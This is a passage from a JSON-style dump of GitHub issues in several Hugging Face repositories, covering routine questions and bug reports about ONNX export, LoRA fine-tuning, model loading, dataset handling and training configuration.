zero:\r\n\r\nhttps://github.com/huggingface/diffusers/blob/41e4779d988ead99e7acd78dc8e752de88777d0f/src/diffusers/loaders/lora_pipeline.py#L1905\n\n### Logs\n\n_No response_\n\n### System Info\n\nubuntu\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9822", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-31T18:01:29Z", "updated_at": "2024-12-10T14:37:32Z", "comments": 8, "user": "christopher5106" }, { "repo": "huggingface/datasets", "number": 7268, "title": "load_from_disk", "body": "### Describe the bug\n\nI have data saved with save_to_disk. The data is big (700Gb). When I try loading it, the only option is load_from_disk, and this function copies the data to a tmp directory, causing me to run out of disk space. Is there an alternative solution to that?\n\n### Steps to reproduce the bug\n\nwhen trying to load data using load_From_disk after being saved using save_to_disk \n\n### Expected behavior\n\nrun out of disk space\n\n### Environment info\n\nlateest version", "url": "https://github.com/huggingface/datasets/issues/7268", "state": "open", "labels": [], "created_at": "2024-10-31T11:51:56Z", "updated_at": "2025-07-01T08:42:17Z", "comments": 3, "user": "ghaith-mq" }, { "repo": "huggingface/peft", "number": 2188, "title": "How to change 'modules_to_save' setting when reloading a lora finetuned model", "body": "### System Info\n\n- `transformers` version: 4.36.2\r\n- Platform: Linux-3.10.0-1160.49.1.el7.x86_64-x86_64-with-glibc2.17\r\n- Python version: 3.9.19\r\n- Huggingface_hub version: 0.24.6\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 0.21.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@BenjaminBossan\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n\r\n\r\n@BenjaminBossan 1. I use lora to finetune whisper,and get the model A. The settings are\r\n```\r\nconfig = LoraConfig(r=8, lora_alpha=16,target_modules=target_modules,modules_to_save=modules_to_save,lora_dropout=0.05, bias=\"none\")\r\nmodel = get_peft_model(model, config)\r\n```\r\nand then I change the source code of model A, I add an additional layer. I now want to train a model with an extra layer based on the lora trained model A. I use:\r\n```\r\nmodel_lora_path = \"../lora_path/\" + 'checkpoint-56416'\r\n\r\nmodel = PeftModel.from_pretrained(model,model_lora_path,ignore_mismatched_sizes=True).cuda()\r\n\r\n```\r\nBut the model LoraConfig's \"modules_to_save\" can not be changed, I want to store the additional layer in to 'adapter_model.safetensors' How can I change my code?\r\nIn short, I want to add parameters to modules_to_save in LoraConfig during the reload process based on the trained lora model so that the additional layer can be stored.\r\n\r\nI tried to use `model.peft_config['default'].modules_to_save.extend(modules_to_save)` to add the \u201cmodules_to_save\u201d but it doesn't work.\n\n### Expected behavior\n\nChange reload lora model's LoraConfig settings", "url": "https://github.com/huggingface/peft/issues/2188", "state": "closed", "labels": [], "created_at": "2024-10-30T12:26:37Z", "updated_at": "2024-12-08T15:03:37Z", "user": "dengchengxifrank" }, { "repo": "huggingface/huggingface.js", "number": 996, "title": "@huggingface/hub: how to use `modelInfo` with proper typing", "body": "THe `modelInfo` method is allowing the caller to define which field will be provided, it has been added in https://github.com/huggingface/huggingface.js/pull/946\r\n\r\nhttps://github.com/huggingface/huggingface.js/blob/186ab738e2f9c7c3613330d45e44848186958815/packages/hub/src/lib/model-info.ts#L9-L11\r\n\r\nHere is an example \r\n\r\n```typescript\r\n$: const info = await modelInfo({\r\n\tname: \"openai-community/gpt2\",\r\n});\r\n$: console.log(info);\r\n{\r\n id: '621ffdc036468d709f17434d',\r\n name: 'openai-community/gpt2',\r\n private: false,\r\n task: 'text-generation',\r\n downloads: 13764131,\r\n gated: false,\r\n likes: 2334,\r\n updatedAt: 2024-02-19T10:57:45.000Z\r\n}\r\n```\r\n\r\nWe can ask for additional fields, using the `additionalFields`. Here is an example\r\n\r\n```typescript\r\n$: const info = await modelInfo({\r\n\tname: \"openai-community/gpt2\",\r\n additionalFields: ['author'],\r\n});\r\n$: console.log(info);\r\n{\r\n // ... omitted \r\n author: 'openai-community',\r\n}\r\n```\r\n\r\nHowever I am not able to find proper typing for the method calling and return type.\r\n\r\nThe return type of `modelInfo` is the following\r\n\r\nhttps://github.com/huggingface/huggingface.js/blob/186ab738e2f9c7c3613330d45e44848186958815/packages/hub/src/lib/model-info.ts#L21\r\n\r\nThe additionalFields is the following\r\n\r\nhttps://github.com/huggingface/huggingface.js/blob/186ab738e2f9c7c3613330d45e44848186958815/packages/hub/src/lib/model-info.ts#L15\r\n\r\nBut, I am getting an error when doing the following\r\n\r\n```typescript\r\nconst info = await modelInfo<'author'>({\r\n\tname: \"openai-community/gpt2\",\r\n\tadditionalFields: ['author'],\r\n});\r\n```\r\n\r\n`TS2344: Type string does not satisfy the constraint never`\r\n\r\nI am also interesting in getting the full `ApiModelInfo` object, but I am not able to use the method with the right typing :thinking: .\r\n\r\ncc @coyotte508 :)\r\n", "url": "https://github.com/huggingface/huggingface.js/issues/996", "state": "closed", "labels": [], "created_at": "2024-10-30T10:41:36Z", "updated_at": "2024-10-30T12:02:47Z", "user": "axel7083" }, { "repo": "huggingface/diffusers", "number": 9802, "title": "Multidiffusion (panorama pipeline) is missing segmentation inputs?", "body": "I'm looking at the multidiffusion panorama pipeline page (https://huggingface.co/docs/diffusers/en/api/pipelines/panorama). It looks like there is no way to specify the segmentation and associated prompts as in the original paper https://multidiffusion.github.io/ . If the code only has the panorama capability and not the region based generation using segmentation and prompts, then it should be extended to include the regional generation... If it does have region based generation then the documentation should be updated to show how to use it!", "url": "https://github.com/huggingface/diffusers/issues/9802", "state": "open", "labels": [ "stale" ], "created_at": "2024-10-29T20:15:15Z", "updated_at": "2024-12-24T15:03:30Z", "comments": 5, "user": "jloveric" }, { "repo": "huggingface/transformers.js", "number": 1000, "title": "Error while converting LLama-3.1:8b to ONNX", "body": "### Question\n\nHey @xenova,\r\n\r\nThanks a lot for this library! I tried converting [`meta-llama/Llama-3.1-8B-Instruct`](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) to ONNX using the following command (on `main`):\r\n\r\n```bash\r\npython -m scripts.convert --quantize --model_id \"meta-llama/Llama-3.1-8B-Instruct\"\r\n```\r\n\r\nUsing the following `requirements.py` file (in a fresh env):\r\n```\r\ntransformers[torch]==4.43.4\r\nonnxruntime==1.19.2\r\noptimum==1.21.3\r\nonnx==1.16.2\r\nonnxconverter-common==1.14.0\r\ntqdm==4.66.5\r\nonnxslim==0.1.31\r\n--extra-index-url https://pypi.ngc.nvidia.com\r\nonnx_graphsurgeon==0.3.27\r\n```\r\n\r\nBut got the following error:\r\n```\r\nFramework not specified. Using pt to export the model.\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4/4 [00:27<00:00, 6.99s/it]\r\nAutomatic task detection to text-generation-with-past (possible synonyms are: causal-lm-with-past).\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\n\r\n***** Exporting submodel 1/1: LlamaForCausalLM *****\r\nUsing framework PyTorch: 2.5.0\r\nOverriding 1 configuration item(s)\r\n - use_cache -> True\r\nWe detected that you are passing `past_key_values` as a tuple and this is deprecated and will be removed in v4.43. Please use an appropriate `Cache` class (https://huggingface.co/docs/transformers/v4.41.3/en/internal/generation_utils#transformers.Cache)\r\n/site-packages/transformers/models/llama/modeling_llama.py:1037: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if sequence_length != 1:\r\nTraceback (most recent call last):\r\n File \"/python3.10/runpy.py\", line 196, in _run_module_as_main\r\n return _run_code(code, main_globals, None,\r\n File \"/python3.10/runpy.py\", line 86, in _run_code\r\n exec(code, run_globals)\r\n File \"scripts/convert.py\", line 462, in \r\n main()\r\n File \"scripts/convert.py\", line 349, in main\r\n main_export(**export_kwargs)\r\n File \"/site-packages/optimum/exporters/onnx/__main__.py\", line 365, in main_export\r\n onnx_export_from_model(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 1170, in onnx_export_from_model\r\n _, onnx_outputs = export_models(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 776, in export_models\r\n export(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 881, in export\r\n export_output = export_pytorch(\r\n File \"/site-packages/optimum/exporters/onnx/convert.py\", line 577, in export_pytorch\r\n onnx_export(\r\n File \"/site-packages/torch/onnx/__init__.py\", line 375, in export\r\n export(\r\n File \"/site-packages/torch/onnx/utils.py\", line 502, in export\r\n _export(\r\n File \"/site-packages/torch/onnx/utils.py\", line 1564, in _export\r\n graph, params_dict, torch_out = _model_to_graph(\r\n File \"/site-packages/torch/onnx/utils.py\", line 1117, in _model_to_graph\r\n graph = _optimize_graph(\r\n File \"/site-packages/torch/onnx/utils.py\", line 663, in _optimize_graph\r\n _C._jit_pass_onnx_graph_shape_type_inference(\r\nRuntimeError: The serialized model is larger than the 2GiB limit imposed by the protobuf library. Therefore the output file must be a file path, so that the ONNX external data can be written to the same directory. Please specify the output file name.\r\n```\r\n\r\nI saw this somewhat related issue #967, but the error didn't happen on the ONNX library (I think `v3` has been merged now).\r\n\r\nDo you have a fix for larger models such as this one? I also tried with [`meta-llama/Llama-3.2-3B-Instruct`](https://huggingface.co/meta-llama/Llama-3.2-3B-Instruct), but I got the same error, even though I see [here](https://huggingface.co/onnx-community/Llama-3.2-3B-Instruct) that you managed to convert it successfully.\r\n\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/1000", "state": "open", "labels": [ "question" ], "created_at": "2024-10-29T09:40:14Z", "updated_at": "2024-10-29T09:40:14Z", "user": "charlesbvll" }, { "repo": "huggingface/chat-ui", "number": 1545, "title": "Support markdown & code blocks in text input", "body": "## Describe your feature request\r\n\r\nWould be nice to support code block in the text input bar, that would make it easier to input code. we could also support basic markdown features like bold or italic, maybe not headings tho.\r\n\r\n## Screenshots (if relevant)\r\n\r\nTry https://claude.ai/new to see an example of how this could work\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1545", "state": "open", "labels": [ "enhancement", "front" ], "created_at": "2024-10-28T08:42:58Z", "updated_at": "2024-11-11T20:26:32Z", "comments": 2, "user": "nsarrazin" }, { "repo": "huggingface/peft", "number": 2181, "title": "How can I do to export mode format as gguf", "body": "### Feature request\n\nThis is a good project,I just got it today and encountered some problems.\r\nmy any code\r\n``` python\r\nfrom peft import AutoPeftModelForCausalLM\r\n\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\n\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"Qwen2-0.5B\")\r\n\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(\"model\")\r\nmodel.save_pretrained('directory')\r\n\r\n```\r\nI need gguf file deploy by ollama.Whern I export model format as gguf.\r\n\r\nI use \r\n```shell\r\n!python llama.cpp/convert_hf_to_gguf.py directory\r\n```\r\nbut it error\r\n```\r\nINFO:hf-to-gguf:Loading model: directory\r\nTraceback (most recent call last):\r\n File \"/Users/xu756/AIGC/llama.cpp/convert_hf_to_gguf.py\", line 4436, in \r\n main()\r\n File \"/Users/xu756/AIGC/llama.cpp/convert_hf_to_gguf.py\", line 4404, in main\r\n hparams = Model.load_hparams(dir_model)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/xu756/AIGC/llama.cpp/convert_hf_to_gguf.py\", line 462, in load_hparams\r\n with open(dir_model [/](https://file+.vscode-resource.vscode-cdn.net/) \"config.json\", \"r\", encoding=\"utf-8\") as f:\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\nFileNotFoundError: [Errno 2] No such file or directory: 'directory/config.json'\r\n\r\n\r\n```\r\n\r\n\"image\"\r\n\r\n\r\n\n\n### Motivation\n\nI need gguf file deploy by ollama.\r\nIs there any other way to deploy the PEFT model?\r\n\r\nThank you very much.\n\n### Your contribution\n\nI simply reproduced it on top", "url": "https://github.com/huggingface/peft/issues/2181", "state": "closed", "labels": [], "created_at": "2024-10-26T13:51:45Z", "updated_at": "2024-10-26T13:59:18Z", "user": "xu756" }, { "repo": "huggingface/diffusers", "number": 9772, "title": "Support ControlNetPlus Union if not already supported", "body": "It's not clear if ControlNetPlus is already supported by diffusers https://github.com/xinsir6/ControlNetPlus/tree/main/pipeline which consists of union controlnet for SDXL. This model seems to support the only SDXL segmentation that I'm aware of. If not already supported, it should be!\r\n\r\nhttps://github.com/xinsir6/ControlNetPlus/tree/main\r\n", "url": "https://github.com/huggingface/diffusers/issues/9772", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2024-10-25T17:43:43Z", "updated_at": "2024-12-11T17:07:54Z", "comments": 5, "user": "jloveric" }, { "repo": "huggingface/transformers.js", "number": 994, "title": "Will these mistakes have an impact?", "body": "### Question\n\nAfter AutoProcessor.from_pretrained is loaded, an error occurred, and the error message is as follows:\r\n````typescript\r\nort-wasm-simd-thread\u2026jsep.wasm:0x10367e0 2024-10-25 20:11:31.705399 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\r\nort-wasm-simd-thread\u2026jsep.wasm:0x10367e0 2024-10-25 20:11:31.706300 [W:onnxruntime:, session_state.cc:1170 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\n\ufeff\r\n\r\n````", "url": "https://github.com/huggingface/transformers.js/issues/994", "state": "open", "labels": [ "question" ], "created_at": "2024-10-25T12:17:03Z", "updated_at": "2024-11-12T11:10:11Z", "user": "aidscooler" }, { "repo": "huggingface/transformers.js", "number": 993, "title": "How do I know the loading progress when loading .onnx file?", "body": "### Question\r\n\r\nBecause the .onnx file is large(about 170M)\uff0cI decided to provide a loading progress. Code as below: \r\n\r\n```` typescript \r\n const modelSettings = {\r\n // Do not require config.json to be present in the repository\r\n config: { model_type: \"custom\" },\r\n subfolder: \"\",\r\n process_callback: (progress) => {\r\n modelLoadingProgress.value = Math.round(progress * 100); \r\n console.log(\"model : \" + progress) \r\n }\r\n };\r\n modelSettings.device = \"webgpu\";\r\n modelSettings.dtype = \"fp32\";\r\n model = await AutoModel.from_pretrained('briaai/RMBG-1.4', modelSettings);\r\n````\r\nI found the process_callback never been called. Can anyone help?", "url": "https://github.com/huggingface/transformers.js/issues/993", "state": "open", "labels": [ "question" ], "created_at": "2024-10-25T05:52:12Z", "updated_at": "2024-10-25T17:54:30Z", "user": "aidscooler" }, { "repo": "huggingface/finetrainers", "number": 70, "title": "How to set the resolutions when finetuning I2V model?", "body": "I want to train a video diffusion with lower resolutions. I set the height_buckets=256 and width_buckets=256 in prepare_dataset.sh and process the data. But I run into the following error while run the train_image_to_video_lora.sh script.\r\n\r\nValueError: It is currently not possible to generate videos at a different resolution that the defaults. This should only be the case with 'THUDM/CogVideoX-5b-I2V'.If you think this is incorrect, please open an issue at https://github.com/huggingface/diffusers/issues.\r\n\r\nHow to set the hyperparameters to train with different resolutions?", "url": "https://github.com/huggingface/finetrainers/issues/70", "state": "closed", "labels": [], "created_at": "2024-10-25T05:36:19Z", "updated_at": "2024-11-11T18:27:29Z", "user": "TousakaNagio" }, { "repo": "huggingface/optimum", "number": 2080, "title": "\"ValueError: Trying to export a codesage model\" while trying to export codesage/codesage-large", "body": "### System Info\n\n```shell\noptimum 1.23.2\r\nMacOS 14.7\r\nPython 3.9\n```\n\n\n### Who can help?\n\n@michaelbenayoun \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThis is a PyTorch embedding model released by AWS, as described here: https://www.linkedin.com/posts/changsha-ma-9ba7a485_yes-code-needs-its-own-embedding-models-activity-7163196644258226176-bFSW\r\n\r\nHoping I can use it with RAG under ollama for code understanding.\r\n\r\n```\r\nhuggingface-cli download codesage/codesage-large\r\noptimum-cli export onnx --model codesage/codesage-large codesage-large-onnx --task default --trust-remote-code\r\n```\r\n\r\nThe error: \"ValueError: Trying to export a codesage model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type codesage to be supported natively in the ONNX export.\"\r\n\r\nI am grateful for any help you can provide!\n\n### Expected behavior\n\nAn exported ONNX file.", "url": "https://github.com/huggingface/optimum/issues/2080", "state": "open", "labels": [ "bug" ], "created_at": "2024-10-25T05:27:22Z", "updated_at": "2024-10-25T05:27:22Z", "comments": 0, "user": "TurboEncabulator9000" }, { "repo": "huggingface/chat-ui", "number": 1543, "title": "RFC enable multimodal and tool usage at once for OAI endpoints ?", "body": "https://github.com/huggingface/chat-ui/blob/8ed1691ecff94e07d10dfb2874d3936d293f4842/src/lib/server/endpoints/openai/endpointOai.ts#L191C53-L191C65\r\n\r\nJust played around with combining both of this\r\nWhat do you think about making tool calling only if no image is in conversation ?\r\nOtherwise we need to insert models twice, once for multi modal and once for tool usage.\r\n\r\nA quick solution could be just checking if image_url is part in one of the messages and if it is skip the tools check\r\n\r\nJust struggled around because the upload file button was there but didnt worked to do something with the uploaded image until checking the code.\r\n\r\n@nsarrazin wdyt ?", "url": "https://github.com/huggingface/chat-ui/issues/1543", "state": "open", "labels": [], "created_at": "2024-10-24T17:37:50Z", "updated_at": "2024-10-24T17:39:14Z", "comments": 0, "user": "flozi00" }, { "repo": "huggingface/transformers.js", "number": 991, "title": "Loading models from \"non-URL\" locations in the browser", "body": "### Question\r\n\r\nHi! I have an application where the model files will be pre-loaded in a custom format into the browsers IndexDb. Based on my understanding, transformer.js currently only supports loading models by URL and then caches them in the browser cache. Getting the model files from the IndexDb instead, seems a little tricky, as it would require to \"copy\" a lot of the loading logic.\r\n\r\nOther ideas were to use a ServiceWorker to intercept the model download and mock the response with the files from IndexDb, or to write the files directly into browser cache that transformer.js uses.\r\n\r\nBoth solutions seem hacky... So, before I embark on writing my own loading logic, I wanted to ask, if you have any ideas or suggestions on how to approach this?\r\n\r\nThanks in advance!", "url": "https://github.com/huggingface/transformers.js/issues/991", "state": "open", "labels": [ "question" ], "created_at": "2024-10-24T12:18:19Z", "updated_at": "2024-12-04T19:30:07Z", "user": "AKuederle" }, { "repo": "huggingface/finetrainers", "number": 68, "title": "How to set the hyperparameters when finetuning I2V model with LoRA?", "body": "File \"/home/shinji106/ntu/cogvideox-factory/training/dataset.py\", line 411, in __iter__ \r\n self.buckets[(f, h, w)].append(data) \r\nKeyError: (16, 320, 720)\r\n\r\nThe resolution is (13, 320, 480) so the key of self.bucket does not match with input.\r\nHow do I set the hyperparameters when running the prepare_dataset.sh and train_image_to_video_lora.sh so that the key will match?", "url": "https://github.com/huggingface/finetrainers/issues/68", "state": "closed", "labels": [], "created_at": "2024-10-24T08:06:33Z", "updated_at": "2025-01-10T23:40:06Z", "user": "TousakaNagio" }, { "repo": "huggingface/datasets", "number": 7249, "title": "How to debugging", "body": "### Describe the bug\n\nI wanted to use my own script to handle the processing, and followed the tutorial documentation by rewriting the MyDatasetConfig and MyDatasetBuilder (which contains the _info,_split_generators and _generate_examples methods) classes. Testing with simple data was able to output the results of the processing, but when I wished to do more complex processing, I found that I was unable to debug (even the simple samples were inaccessible). There are no errors reported, and I am able to print the _info,_split_generators and _generate_examples messages, but I am unable to access the breakpoints.\n\n### Steps to reproduce the bug\n\n# my_dataset.py\r\nimport json\r\nimport datasets\r\n\r\n\r\nclass MyDatasetConfig(datasets.BuilderConfig):\r\n def __init__(self, **kwargs):\r\n super(MyDatasetConfig, self).__init__(**kwargs)\r\n\r\n\r\nclass MyDataset(datasets.GeneratorBasedBuilder):\r\n VERSION = datasets.Version(\"1.0.0\")\r\n\r\n BUILDER_CONFIGS = [\r\n MyDatasetConfig(\r\n name=\"default\",\r\n version=VERSION,\r\n description=\"myDATASET\"\r\n ),\r\n ]\r\n\r\n def _info(self):\r\n print(\"info\") # breakpoints\r\n return datasets.DatasetInfo(\r\n description=\"myDATASET\",\r\n features=datasets.Features(\r\n {\r\n \"id\": datasets.Value(\"int32\"),\r\n \"text\": datasets.Value(\"string\"),\r\n \"label\": datasets.ClassLabel(names=[\"negative\", \"positive\"]),\r\n }\r\n ),\r\n supervised_keys=(\"text\", \"label\"),\r\n )\r\n\r\n def _split_generators(self, dl_manager):\r\n \r\n print(\"generate\") # breakpoints\r\n data_file = \"data.json\" \r\n\r\n return [\r\n datasets.SplitGenerator(\r\n name=datasets.Split.TRAIN, gen_kwargs={\"filepath\": data_file}\r\n ),\r\n ]\r\n\r\n def _generate_examples(self, filepath):\r\n print(\"example\") # breakpoints\r\n with open(filepath, encoding=\"utf-8\") as f:\r\n data = json.load(f)\r\n for idx, sample in enumerate(data):\r\n yield idx, {\r\n \"id\": sample[\"id\"],\r\n \"text\": sample[\"text\"],\r\n \"label\": sample[\"label\"],\r\n }\r\n\r\n#main.py\r\nimport os\r\nos.environ[\"TRANSFORMERS_NO_MULTIPROCESSING\"] = \"1\" \r\n\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"my_dataset.py\", split=\"train\", cache_dir=None)\r\n\r\nprint(dataset[:5])\n\n### Expected behavior\n\nPause at breakpoints while running debugging\n\n### Environment info\n\npycharm\r\n", "url": "https://github.com/huggingface/datasets/issues/7249", "state": "open", "labels": [], "created_at": "2024-10-24T01:03:51Z", "updated_at": "2024-10-24T01:03:51Z", "user": "ShDdu" }, { "repo": "huggingface/sentence-transformers", "number": 3015, "title": "How to customize the dataloader? e.g. Custom Data Augmentation", "body": "Hi,\r\n\r\nI've always been used to the old .fit behaviour where I could pass in the good DataLoader, implementing the Dataset myself, according to my needs.\r\n\r\nWith the new trainer interface, how am I supposed to tweak the dataloader? \r\n\r\nLet's say I want to apply some random transformations to the input text, how can I do it right now? Of course, changing the original dataset, augmenting it statically, is a no-go.\r\n\r\nThanks!", "url": "https://github.com/huggingface/sentence-transformers/issues/3015", "state": "open", "labels": [], "created_at": "2024-10-23T17:11:13Z", "updated_at": "2024-11-15T10:32:35Z", "user": "msciancalepore98" }, { "repo": "huggingface/diffusers", "number": 9756, "title": "Could not find loading_adapters.ipynb", "body": "### Describe the bug\r\n\r\nwhile reading doc [Load adapters](https://huggingface.co/docs/diffusers/using-diffusers/loading_adapters)\r\n\r\nI tried to open in Colab to run an example on this page.\r\n\r\n\"open_colab\"\r\n\r\n\r\nIt will get Notebook not found on a new page.\r\n\r\nIt can't find loading_adapters.ipynb in [huggingface/notebooks](https://github.com/huggingface/notebooks)\r\n\r\n\r\n\r\n\r\n### Reproduction\r\n\r\nI follow the doc and write down a Google Colab [Google Colab loading_adapters](https://colab.research.google.com/drive/1pYpvsOf6U9CAZfughY1aUltUQTFsw4OI)\r\n\r\nCan I contribute a pr for this?\r\nDo you know how I can do this?\r\nCommit to notebook repo?\r\nOr something different?\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nGoogle Colab\r\n\r\n### Who can help?\r\n\r\n@stevhliu @sayakpaul", "url": "https://github.com/huggingface/diffusers/issues/9756", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-23T13:03:11Z", "updated_at": "2024-11-01T15:27:56Z", "comments": 6, "user": "thliang01" }, { "repo": "huggingface/accelerate", "number": 3190, "title": "How to save the optimizer state while enabling Deepspeed to save the model", "body": "### System Info\n\n```Shell\nUnrelated to configuration\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nunwrapped_model = accelerator.unwrap_model(transformer) \r\nunwrapped_model.save_pretrained(save_directory, \r\nsave_function=accelerator.save, \r\nstate_dict=accelerator.get_state_dict(transformer))\r\n```\r\nI am using Deepspeed Zero2.\r\nI want to save the model state and optimizer state, but the current `save_pretrained()` only supports saving the model state. How can I save the optimizer state? \n\n### Expected behavior\n\nI would like to know if it supports saving optimizer state and how to use it. \r\n\r\nTHANKS\uff01", "url": "https://github.com/huggingface/accelerate/issues/3190", "state": "closed", "labels": [], "created_at": "2024-10-23T11:58:08Z", "updated_at": "2024-11-01T02:53:38Z", "user": "ITerydh" }, { "repo": "huggingface/diffusers", "number": 9750, "title": "Is it possible to provide img2img code for CogView3?", "body": "Is it possible to provide img2img code for CogView3?", "url": "https://github.com/huggingface/diffusers/issues/9750", "state": "open", "labels": [ "stale", "contributions-welcome" ], "created_at": "2024-10-23T07:40:38Z", "updated_at": "2024-12-20T15:04:01Z", "comments": 3, "user": "ChalvYongkang" }, { "repo": "huggingface/optimum", "number": 2076, "title": "Problem converting tinyllama to onnx model with optimum-cli", "body": "### System Info\n\n```shell\nmain branch newest\r\nlocal pip install\n```\n\n\n### Who can help?\n\n@michaelbenayoun\r\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\noptimum-cli export onnx --model /home/wangzhiqun/TinyLlama-1.1B-Chat-v1.0 --task text-generation --batch_size 1 --sequence_length 128 tinyllama_onnx_file\n\n### Expected behavior\n\nTo specify the batch_size and sequence_length, I use the following \"optimum-cli export onnx --model /home/wangzhiqun/TinyLlama-1.1B-Chat-v1.0 --task text-generation --batch_size 1 --sequence_length 128 tinyllama_onnx_file\". But the exported onnx model still holds the shape [batch_size, sequence_length]. How can I specify the fixed dimensions?", "url": "https://github.com/huggingface/optimum/issues/2076", "state": "open", "labels": [ "bug" ], "created_at": "2024-10-22T06:23:51Z", "updated_at": "2024-10-22T06:36:42Z", "comments": 0, "user": "hayyaw" }, { "repo": "huggingface/diffusers", "number": 9731, "title": "How to use Playground2.5 to train lora with own dataset to generate pictures of a specific style\uff1f", "body": "### Describe the bug\n\nHi,\r\n\r\nI have been working on training models using the same dataset as \"stabilityai/stable-diffusion-xl-base-1.0\" with the script examples/text_to_image/train_text_to_image_lora_sdxl.py, and I achieved quite promising results.\r\n\r\nNow, I am trying to further improve the performance by switching to Dreambooth. I am currently using playground2.5 with examples/dreambooth/train_dreambooth_lora_sdxl.py. However, after multiple parameter tuning attempts, the performance is still not as good as the SDXL base model.\r\n\r\nI am unsure what might be causing this.\n\n### Reproduction\n\n![image](https://github.com/user-attachments/assets/339a0e9b-de08-408d-a43a-495f86b5e1df)\r\n\n\n### Logs\n\n_No response_\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.14.0-284.25.1.el9_2.x86_64-x86_64-with-glibc2.17\r\n- Running on Google Colab?: No\r\n- Python version: 3.8.20\r\n- PyTorch version (GPU?): 2.2.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.2\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.1\r\n- PEFT version: 0.13.2\r\n- Bitsandbytes version: 0.44.1\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA H800, 81559 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9731", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-10-21T12:10:12Z", "updated_at": "2024-11-20T15:03:04Z", "user": 